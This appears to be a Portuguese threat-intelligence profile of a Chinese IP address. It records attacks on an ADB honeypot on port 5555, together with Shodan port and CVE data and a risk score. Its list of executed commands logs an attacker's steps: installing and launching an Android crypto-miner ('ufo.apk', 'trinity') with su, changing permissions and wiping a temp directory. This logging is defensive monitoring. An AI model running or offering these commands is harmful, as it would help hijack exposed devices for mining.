TROYANOSYVIRUS
Ameaca AtivaMEDIO

115.233.222.114

Pais de Origem🇨🇳 China
Primeira Deteccao22/03/2026
Ultima Atividade19/04/2026
ISPChinanet
🎯
68
Ataques Totais
🔌
1
Portas
📡
1
Tipos de Ataque
🦠
4
Malware

Geolocalizacao

Pais
🇨🇳 China
Cidade
Desconhecida
ASN
AS4134
ISP
Chinanet

Tipos de Ataque

adb_honeypot

Portas Atacadas

5555

Malware Associado

Comandos Executados

$am start -n com.ufo.miner/com.example.test.MainActivity2x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity2x
$ps | grep trinity2x
$rm -f /data/local/tmp/ufo.apk2x
$pm install /data/local/tmp/ufo.apk2x
$chmod 0755 /data/local/tmp/nohup2x
$chmod 0755 /data/local/tmp/trinity2x
$rm -rf /data/local/tmp/*2x
$pm path com.ufo.miner2x
$/data/local/tmp/nohup /data/local/tmp/trinity2x

Exposicao Shodan InternetDBShodan

Dados InternetDB, nao em tempo real

Portas
2312380898099844318023
Vulnerabilidades
CVE-2017-20005CVE-2017-7529CVE-2016-1247CVE-2016-0742CVE-2016-4450CVE-2016-0746CVE-2021-23017CVE-2016-0747CVE-2018-16845CVE-2021-3618CVE-2019-20372
CPEs
cpe:/a:apache:tomcatcpe:/a:ntp:ntp:3cpe:/a:f5:nginx:1.8.0

Avaliacao de Risco

50
/100
BaixoMedioAltoCritico